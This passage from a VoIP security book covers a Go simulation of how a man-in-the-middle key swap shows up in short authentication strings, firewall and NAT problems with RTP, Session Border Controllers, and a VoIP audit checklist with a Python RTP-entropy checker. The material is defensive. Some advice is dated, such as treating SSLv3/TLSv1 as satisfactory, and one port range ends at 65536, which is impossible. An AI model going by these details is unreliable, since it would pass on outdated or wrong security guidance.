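// flight with one of her own, so she ends up holding two separate secrets.
// It returns the SAS each phone would display and whether they agree.
func RunCall(withMITM bool) (sasSonia, sasKusum string, match bool, err error) {
	sonia, err := newEndpoint("Sonia")
	if err != nil {
		return "", "", false, err
	}
	kusum, err := newEndpoint("Kusum")
	if err != nil {
		return "", "", false, err
	}
	// What each side actually receives.
	seenBySonia, seenByKusum := kusum.pub(), sonia.pub()
	if withMITM {
		mitmToKusum, _ := newEndpoint("mitm-as-Sonia")
		mitmToSonia, _ := newEndpoint("mitm-as-Kusum")
		seenByKusum, seenBySonia = mitmToKusum.pub(), mitmToSonia.pub()
	}
	if err := sonia.agree(seenBySonia); err != nil {
		return "", "", false, err
	}
	if err := kusum.agree(seenByKusum); err != nil {
		return "", "", false, err
	}
	sasSonia = SAS(sonia.secret, sonia.pub(), seenBySonia)
	sasKusum = SAS(kusum.secret, seenByKusum, kusum.pub())
	return sasSonia, sasKusum, sasSonia == sasKusum, nil
}

func main() {
	for _, mitm := range []bool{false, true} {
		a, b, ok, err := RunCall(mitm)
		if err != nil {
			panic(err)
		}
		fmt.Printf("mitm=%-5v Sonia reads %q, Kusum reads %q, match=%v\n", mitm, a, b, ok)
	}
}
```

The check only works if the two people compare the strings over the call itself; an intermediary who can substitute keys but cannot convincingly imitate both voices cannot make the two displays agree.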
Firewalls and Session Border Controllers

To put it mildly, firewalls and VoIP networks are not best friends. The relationship started out badly when VoIP asked Firewall to allow all UDP ports greater than 1024 through, as if it were a normal request. Firewall was greatly offended, and the two have not talked much since then.
The VoIP and Firewall Problem
While recent changes to VoIP devices have reduced the number of ports needed, several VoIP networks still use a lot of ports on the network, where many of them are not static. For example, the following list shows the possible ports that may be used in a VoIP network:
SIP
   TCP/UDP 5060
   TCP/UDP 5061
IAX
   TCP/UDP 4569
RTP
   UDP 1024-65535 (audio/video)
   UDP 1024-65535 (control)
H.323
   TCP/UDP 1718 (Discovery)
   TCP/UDP 1719 (RAS)
   TCP/UDP 1720 (H.323 setup)
   TCP/UDP 1731 (Audio Control)
   TCP/UDP 1024-65536 (H.245)
The list does not look too bad at first, but when dynamic ports are used with RTP, the list becomes quite large. Because both SIP and H.323 use RTP for media transfer, both of the major session setup protocols are a burden for firewalls. Because RTP uses a dynamic set of ports by default, it limits the firewall's ability to pinpoint the exact port or ports that need to be opened. Another issue, besides opening a lot of ports through the firewall, is Network Address Translation (NAT). NATed endpoints trying to reach external entities can have problems because the real source and destination addresses and ports for the UDP-based RTP stream are carried inside the signaling payload. This limits the ability of a standard firewall to see the correct endpoint. This behavior allows VoIP sessions to be set up with SIP or H.323, but RTP has a difficult time finding its destination. Figure 9-5 shows an example of these issues.
Figure 9-5. Dynamic RTP ports and firewalls
The Solution
Plenty of solutions have addressed the issues with dynamic ports and NAT, including the use of static ports for RTP media, firewalls that are VoIP-aware, and the use of Session Border Controllers and gatekeepers. Most VoIP vendors now support the use of static media ports for communication. For example, the RTP media stream between two entities can be limited to a port or two, drastically reducing the number of ports opened in the firewall for RTP streams. This allows VoIP endpoints to make outbound calls with SIP or H.323 and allows the media ports to be opened on the firewall. While there is no industry standard for static media ports, many organizations and vendors choose a static port or two based on their unique deployment.

Another method of making organizations happier with VoIP is the use of Session Border Controllers (SBCs). SBCs are devices used to manage signaling (SIP and H.323) and media communication (RTP) between endpoints, with NAT functionality. The devices usually sit outside the firewall in the DMZ or external network so they can set up, communicate, and tear down calls on behalf of endpoints. SBCs usually speak to a gatekeeper (H.323) or Proxy server (SIP) inside the firewall on the internal network. In most situations, a firewall rule is created allowing these two entities to talk to each other, but nothing else. Hence, only one rule is created in the firewall, and all endpoints speak to the internal H.323 gatekeeper or SIP Proxy server. The internal H.323 gatekeeper or SIP Proxy server is allowed to talk to the SBC, which goes out and makes the connection with the remote endpoint on the user's behalf. Similarly, the reverse communication runs through the external SBC, which is then allowed to talk only to the internal H.323 gatekeeper or SIP Proxy server. The internal H.323 gatekeeper or SIP Proxy server then passes the packets to the correct endpoint. Figure 9-6 shows an example of the architecture.
Figure 9-6. SBC with VoIP infrastructure

Summary

Securing VoIP networks is not an easy task, but it is an important one. While the process can be cumbersome, deploying SIPS, SRTP, or ZRTP can drastically reduce the attack surface on a VoIP network. The ability to provide encryption at both the session layer and media layer can ensure that users are receiving the same level of security as, if not more than, they would have if using traditional phone systems. Furthermore, sensitive audio communication, from internal calls regarding stock information to privacy concerns about personal data, might be mandated to be as secure as any other entity (e.g., files and folders) on the network holding the same type of information. Finally, softphones using RTP can deploy new technologies such as Zfone, allowing users additional security on softphones that might not provide it natively.

TLS is a basic requirement for web communication; however, it also has had more than 10 years of infrastructure built into it. For example, a root chain tree that is built into Internet Explorer and Firefox makes it very easy to build a public network using TLS. Unfortunately, hard phones do not have that same luxury. Furthermore, SRTP and ZRTP solve many issues, but the lack of support and interoperability between vendors still keeps them from being an easy plug-and-play deployment. Also, firewalls that usually help with network protocols actually add to the issue, as their support for VoIP protocols is marginal at best. The bumpy road that is securing VoIP needs to be completed. Any organization that is willing to accept the risks might as well share their voicemail passwords with every employee of the company. Then again, a voicemail password is probably nothing when compared with the credit card numbers, personal health information, or social security numbers that are continually being transmitted on voice calls. Secure designs, the use of encryption at the session layer and media layer, and integrity protection must be staples of VoIP if it does not want to be the weakest link in the IT network. Furthermore, integrity and confidentiality have traditionally been assumed in voice communication, and they should have that same status in VoIP devices as well.
Chapter 10. AUDITING VOIP FOR SECURITY BEST PRACTICES

Auditing VoIP networks is an important step in securing them. In most VoIP networks, there are many moving parts that may have a negative effect on security. For example, the use of strong session security may be negated by poor media security. Furthermore, encrypted media communication may be invalidated if session setup protocols send the encryption key in cleartext. Each aspect of VoIP, including the network, devices, software, and protocols, should be analyzed in terms of security. A poor security setting on one entity can affect the strong security of others. Auditing VoIP networks, identifying security gaps, and then implementing solutions that mitigate exposed risk is often the best approach.

Auditing VoIP networks for security is a good first step in understanding the risk of the network infrastructure and its components. If gaps are not identified in a given network, remedying issues, tracking progress, and moving toward a strong security model for voice communication will be very difficult. This chapter will focus on auditing VoIP networks for proper security settings and controls. Additionally, the best practices for securing VoIP entities will be discussed.
VoIP Security Audit Program

VoIP Security Audit Program (VSAP) version 1.0 is a methodology created by the author in order to begin the process of developing a clear standard for measuring VoIP security so that organizations can understand how strong their VoIP networks are. Furthermore, the standard will create a baseline to start measuring VoIP. The author will continue to update VSAP even after the book's publication. Additionally, an interactive version of VSAP can be downloaded from http://www.isecpartners.com/tools.html/. After a user answers the questions in the interactive version of VSAP, it will display the results with an overall risk score for the VoIP network. VSAP is organized like a typical audit program, using a question-and-answer format with different levels of measurement, including Satisfactory, Unsatisfactory, and Mixed. The following table shows the contents of VSAP.

Table 10-1. VoIP Audit Program
(Columns: Audit Topic, Audit Questions, Audit Results)

Audit Topic: SIP authentication
SIPS, or SIP wrapped in a TLS tunnel, should be used for session layer protection when using SIP.
Audit Question: How is session setup authentication used with SIP?
Audit Results: Satisfactory: SIP with SSL/TLS. Unsatisfactory: Standard SIP digest authentication.

Audit Topic: SIP register
SIP User Agent should authenticate REGISTER and INVITE requests.
Audit Question: Are SIP REGISTER and INVITE requests authenticated?
Audit Results: Satisfactory: SIP REGISTER and INVITE requests are authenticated. Unsatisfactory: SIP REGISTER and INVITE requests are not authenticated.

Audit Topic: H.225 authentication
H.225 wrapped in a TLS tunnel should be used for session layer protections using H.323.
Audit Question: How is session setup authentication used with H.323?
Audit Results: Satisfactory: H.323 with SSL/TLS. Unsatisfactory: Standard H.323 authentication with the MD5 hash of a timestamp and password.

Audit Topic: H.225 MD5 authentication time
To limit replay attacks, low NTP thresholds should be used with H.225 MD5 authentication.
Audit Question: Are timestamps from NTP servers that are used with H.225 authentication set to 15 minutes or less?
Audit Results: Satisfactory: Timestamps are set to 15 minutes or less. Unsatisfactory: Timestamps are set to 15 minutes or more.

Audit Topic: IAX authentication
IAX wrapped in a TLS tunnel should be used for session layer protection when using IAX.
Audit Question: How is session setup authentication used with IAX?
Audit Results: Satisfactory: IAX with SSL/TLS. Unsatisfactory: Standard IAX authentication with the MD5 hash of the password.

Audit Topic: Concurrent SIP/IAX/H.323 sessions
Do not allow concurrent sessions with a single username and password (one session per account).
Audit Question: Is a single username and password allowed to authenticate multiple times from multiple endpoints or User Agents?
Audit Results: Satisfactory: A single username and password is limited to only one successful authentication. Unsatisfactory: A single username and password can be authenticated many times.

Audit Topic: Session layer unregistration
Session protocols, such as SIP, H.323, and IAX, should require authentication to unregister an endpoint or User Agent.
Audit Question: Is authentication required to unregister SIP/H.323/IAX clients?
Audit Results: Satisfactory: Authentication is required to unregister an endpoint or User Agent. Unsatisfactory: No authentication is required, but rather a simple UNREGISTER packet from the network disconnects clients.

Audit Topic: LDAP over SSL
If H.323 endpoints or SIP User Agents use an LDAP store for authentication, ensure that LDAP over SSL is enabled to protect authentication credentials.
Audit Question: Is LDAP over SSL used with endpoints or User Agents that are authenticating to an LDAP store?
Audit Results: Satisfactory: LDAP over SSL is used for the VoIP endpoints or User Agents using LDAP stores. Unsatisfactory: LDAP over SSL is not used for the VoIP endpoints or User Agents using LDAP stores.

Audit Topic: Media encryption
Voice communication should be encrypted if it contains private, sensitive, or confidential information.
Audit Question: Voice communication must ensure an adequate level of privacy. Is the media layer encrypted?
Audit Results: Satisfactory: SRTP, AES, or an IPSec tunnel is used for all media communication. Unsatisfactory: No encryption is used on the media layer.

Audit Topic: SRTP key exchange
When SRTP is used, the key exchange should not traverse the network in cleartext. Hence, TLS should be used at all times with SIP or H.323 when SRTP is enabled (otherwise, any security enabled with SRTP is negated).
Audit Question: When SRTP is used, is TLS also used with the session setup protocol, such as SIP or H.323, to ensure that the key exchange does not traverse the network in cleartext?
Audit Results: Satisfactory: TLS is used with SIP/H.323 in combination with SRTP. Unsatisfactory: TLS has not been implemented on SIP/H.323 in combination with SRTP.

Audit Topic: RTP entropy
RTP packets need to contain an adequate level of entropy to help prevent RTP injection attacks. Ensure that the full 64 bits of the SSRC, sequence number, and timestamp use random values rather than sequential values.
Audit Question: How is RTP entropy implemented?
Audit Results: Satisfactory: The RTP media session uses truly random values to prevent attackers from easily guessing values. Unsatisfactory: The timestamp starts with 0 and increments by the length of the codec content (160), the sequence starts with 0 and increments by 1, and the SSRC is a function of time.

Audit Topic: IAX media communication
Voice communication should be encrypted if it contains private, sensitive, or confidential information.
Audit Question: Voice communication must ensure an adequate level of privacy. Is the media layer encrypted?
Audit Results: Satisfactory: SRTP, AES, or an IPSec tunnel is used for all media communication. Unsatisfactory: No encryption is used on the media layer.

Audit Topic: E.164 aliases
E.164 aliases should be unique and difficult to spoof or enumerate.
Audit Question: Are default E.164 aliases used?
Audit Results: Satisfactory: Unique and customized E.164 aliases have been enabled. Unsatisfactory: There has been no change to E.164 aliases.

Audit Topic: Duplicate E.164 alias handling
A gatekeeper's registration conflict policy should be set to Reject, which will prevent spoofed E.164 aliases from overwriting legitimate endpoints. It should be noted that with this setting, an attacker can perform a Denial of Service attack on a legitimate endpoint, register with the gatekeeper, and prevent the legitimate endpoint from registering when it comes back online (because of the Reject policy). Ensure that DoS attacks on endpoints are mitigated before setting the policy.
Audit Question: What is the registration reject policy set to?
Audit Results: Satisfactory: Registration reject. Unsatisfactory: Overwrite.

Audit Topic: Authentication/authorization
A compromised E.164 alias should be useless without the corresponding authentication information.
Audit Question: Are E.164 aliases tied to a single username and password?
Audit Results: Satisfactory: A given username and password can be used with only one specific E.164 alias. Unsatisfactory: E.164 alias and H.323 authentication are not tied together. Hence, a given username and password can be used on any authorized E.164 alias.

Audit Topic: E.164 duplicate errors
Vague error messages for duplicate E.164 aliases should be used.
Audit Question: When attempting to register an H.323 endpoint with a duplicate alias, is the error duplicateAlias(4) sent to the user (on the wire) or a more generic error message, such as securityDenial?
Audit Results: Satisfactory: A generic (securityDenial) error message is sent (on the wire) when two endpoints register with the same alias. Unsatisfactory: duplicateAlias(4) is still used when two endpoints attempt to register with the same alias.

Audit Topic: 802.1x
802.1x-compliant devices, including endpoints and User Agents, should be used on VoIP networks.
Audit Question: Is 802.1x supported on VoIP networks?
Audit Results: Satisfactory: 802.1x is strictly used on VoIP subnets and VLANs. Unsatisfactory: 802.1x is not used on VoIP subnets and VLANs.

Audit Topic: VLAN usage
VLANs are good for segmentation but should not be used as a security control because an attacker can simply unplug a VoIP hard phone from the closest Ethernet jack and plug into the VoIP network with his or her PC. 802.1x can be used to ensure that unauthorized systems are not connected to the VoIP VLAN.
Audit Question: Is the VoIP VLAN using 802.1x?
Audit Results: Satisfactory: The VoIP VLAN is using 802.1x. Unsatisfactory: The VoIP VLAN is not using 802.1x.

Audit Topic: ARP monitoring
Enable ARP monitoring on all video conference networks to detect ARP pollution/poisoning attacks.
Audit Question: Is ARP monitoring occurring on VoIP subnets/VLANs?
Audit Results: Satisfactory: ARP monitoring is occurring on all VoIP subnets/LANs, specifically for man-in-the-middle attacks. Unsatisfactory: No ARP monitoring processes are currently being used.

Audit Topic: Network segmentation
While not a security control, VoIP networks should be separated from data networks.
Audit Question: Are VoIP networks on the same VLANs/subnets as data networks?
Audit Results: Satisfactory: VoIP networks are on their own VLANs. Unsatisfactory: VoIP networks share the same network as the data network.

Audit Topic: In-band/out-of-band management
Management methods for VoIP devices should be out-of-band and managed from a secure and trusted management network. VoIP devices should not be managed from in-band data connections.
Audit Question: Are VoIP devices managed out-of-band via an isolated management network?
Audit Results: Satisfactory: Out-of-band device management via a management network, or encrypted in-band device management via a management network. Unsatisfactory: Out-of-band management via an open internal network, or cleartext device management over in-band networks.

Audit Topic: VoIP management filtering
VoIP device management should be limited to authorized machines using IP address and hostname filters.
Audit Question: Are access filters placed on VoIP devices, filtering access to only management and authorized nodes (via IP address filters or hostname filters)?
Audit Results: Satisfactory: Access filters are used. Unsatisfactory: Access filters are not used.

Audit Topic: VoIP management protocols
Password authentication for management purposes should use encrypted protocols.
Audit Question: What protocols are being used for management and administration?
Audit Results: Satisfactory: SSH, SSL (HTTPS), and/or SNMPv3. Unsatisfactory: telnet, HTTP, and/or SNMPv1.

Audit Topic: SNMP
The use of SNMPv1 is strongly discouraged. If it is a business requirement, use difficult-to-guess community strings and restrict access via a firewall or router access control lists.
Audit Question: Is SNMPv3 used, or is SNMPv1 used via a secure network?
Audit Results: Satisfactory: SNMPv3 is used, or SNMPv1 is used in an isolated management network. Unsatisfactory: SNMPv1 is used via an internal network.

Audit Topic: Timestamp/date
Date and timestamp information should be current in order to ensure the integrity of all log files.
Audit Question: Are date and timestamp information correct on all VoIP entities?
Audit Results: Satisfactory: Date and time are correct. Unsatisfactory: Date and time are not correct.

Audit Topic: Logging
All VoIP devices should log important activity to the management software. Logs should be reviewed regularly.
Audit Question: Are critical, informational, and severe logs stored?
Audit Results: Satisfactory: Logs are stored and reviewed on a regular basis. Unsatisfactory: Logs are not stored or reviewed on a regular basis.

Audit Topic: Hard phone PINs
PINs for hard phones should be unique and consist of more than four characters.
Audit Question: Do all VoIP hard phones contain unique PIN values that consist of four to eight characters?
Audit Results: Satisfactory: Strong PINs greater than four characters are in use. Unsatisfactory: Short PINs, which are usually the last four digits of the user's phone extension, are in use.

Audit Topic: Hard phone boot process
Hard phones should use HTTPS for boot files over the network.
Audit Question: What protocols are being used to transfer boot images from the network to VoIP hard phones?
Audit Results: Satisfactory: HTTPS is in use for boot file transfer. Unsatisfactory: TFTP or HTTP is in use for boot file transfer.

Audit Topic: Toll fraud and abuse
On VoIP devices, enable server-side controls that help prevent the abuse of the phone system. For example, create explicit permissions on who can make calls outbound, join conferences, and make international outbound calls.
Audit Question: Are server-side controls enabled for all VoIP endpoints and User Agents?
Audit Results: Satisfactory: Server-side controls for VoIP endpoints and User Agents are set to limit or control toll fraud and abuse. Unsatisfactory: No server-side controls are being used.

Audit Topic: Auto Discovery
Gatekeepers, Border Controllers, and endpoints should have static IP addresses listed on them.
Audit Question: Are all Auto Discovery values set to off (as a malicious attacker can update the gatekeeper information)?
Audit Results: Satisfactory: All external gatekeepers have Auto Discovery off. Unsatisfactory: External gatekeepers have Auto Discovery on.

Audit Topic: SSL certificates
Devices using SSL for authentication or media communication should use strong SSL certificates.
Audit Question: What types of SSL/TLS certificates are being used?
Audit Results: Satisfactory: Non-self-signed SSLv3/TLSv1 with strong cipher suites only. Unsatisfactory: Self-signed SSL certificates with SSLv2 or below, with either low, medium, or high cipher suites.

Audit Topic: SSL certificate checking
Incorrect, CName-mismatched, or example SSL certificates to and from VoIP devices are automatically disabled.
Audit Question: What is the behavior of VoIP devices when an incorrect, mismatched, expired, or self-signed SSL certificate is identified during session or media connection?
Audit Results: Satisfactory: Connection is immediately dropped. Unsatisfactory: User is prompted for action based on his or her judgment.

Audit Topic: DHCP/DNS servers
Supporting VoIP infrastructure services, such as DHCP and DNS, should use dedicated resources that are not shared with user and data networks.
Audit Question: Are dedicated DNS and DHCP servers used for VoIP networks?
Audit Results: Satisfactory: VoIP networks contain a dedicated DHCP and DNS server. Unsatisfactory: VoIP networks share DHCP/DNS with data and user networks.
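The RTP entropy row of Table 10-1 is the one check in the audit program that can be verified mechanically from a packet capture. The following is an added example, not code from the book or from VSAP: it parses minimal RTP headers from constructed sample packets and reports the row's Unsatisfactory pattern (sequence from 0 by 1, timestamp from 0 by 160, predictable SSRC). The SSRC test (treating a value that looks like a Unix epoch as "a function of time") is an assumption made here.

```python
import struct
from typing import Dict, List, Tuple

def build_rtp_packet(seq: int, ts: int, ssrc: int, payload: bytes = b"\x00" * 160) -> bytes:
    """Build a minimal 12-byte RTP v2 header (no padding/extension/CSRC, PT 0) plus payload."""
    return struct.pack("!BBHII", 0x80, 0, seq & 0xFFFF, ts & 0xFFFFFFFF, ssrc & 0xFFFFFFFF) + payload

def parse_rtp_header(packet: bytes) -> Tuple[int, int, int]:
    """Return (sequence number, timestamp, SSRC) from a raw RTP packet."""
    if len(packet) < 12 or (packet[0] >> 6) != 2:
        raise ValueError("not an RTP version 2 packet")
    _, _, seq, ts, ssrc = struct.unpack("!BBHII", packet[:12])
    return seq, ts, ssrc

def rtp_entropy_audit(packets: List[bytes], frame_samples: int = 160) -> Dict[str, object]:
    """Apply the VSAP 'RTP entropy' check to one captured stream.

    frame_samples is the codec timestamp step (160 samples for 20 ms G.711).
    The SSRC-looks-like-a-timestamp heuristic is an assumption of this example.
    """
    if not packets:
        raise ValueError("no packets to audit")
    headers = [parse_rtp_header(p) for p in packets]
    seqs = [h[0] for h in headers]
    tss = [h[1] for h in headers]
    ssrcs = {h[2] for h in headers}
    findings = []
    # Unsatisfactory: sequence starts at 0 and increments by 1 (16-bit wrap-safe).
    if seqs[0] == 0 and all(((b - a) & 0xFFFF) == 1 for a, b in zip(seqs, seqs[1:])):
        findings.append("sequence number starts at 0 and increments by 1")
    # Unsatisfactory: timestamp starts at 0 and increments by the codec frame length.
    if tss[0] == 0 and all(((b - a) & 0xFFFFFFFF) == frame_samples for a, b in zip(tss, tss[1:])):
        findings.append(f"timestamp starts at 0 and increments by {frame_samples}")
    # Unsatisfactory (assumed test): SSRC in the Unix-epoch range 2000-01-01 .. 2033-05-18.
    if any(946_684_800 <= s <= 2_000_000_000 for s in ssrcs):
        findings.append("SSRC looks like a Unix timestamp (function of time)")
    return {"result": "Unsatisfactory" if findings else "Satisfactory", "findings": findings}

# Constructed sample streams (not real captures).
WEAK_STREAM = [build_rtp_packet(i, i * 160, 1_300_000_000) for i in range(20)]
STRONG_STREAM = [build_rtp_packet(0x5A3C + i, 0x9F1B2C3D + i * 160, 0x2B7E1516) for i in range(20)]

if __name__ == "__main__":
    for name, stream in (("weak", WEAK_STREAM), ("strong", STRONG_STREAM)):
        print(name, rtp_entropy_audit(stream))
```

Run it against packets pulled from a capture of a real call (the RTP payload after the UDP header) to fill in the row for a device under audit.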
Summary

VoIP networks are a collection of software, hardware, infrastructure services, and protocols. This chapter discussed a new standard audit program (VSAP) for consistently measuring VoIP in terms of security. The audit program shows how to audit VoIP entities for standard security practices. Auditing VoIP networks and devices is the best method of identifying the gaps in a VoIP network, in terms of availability and security, and will allow end users to begin the process of mitigating any identified security gaps. Additionally, compliance bodies can use VSAP to demonstrate the strengths and weaknesses of a particular entity. Auditing VoIP networks will help VoIP administrators and security architects measure security. It will inform all interested bodies that appropriate controls are in place or that there is an action plan to put them in place.
COLOPHON

The fonts used in Hacking VoIP are New Baskerville, Futura, and Dogma. The book was printed and bound at Malloy Incorporated in Ann Arbor, Michigan. The paper is Glatfelter Spring Forge 60# Smooth Antique, which is certified by the Sustainable Forestry Initiative (SFI). The book uses a RepKover binding, which allows it to lay flat when open.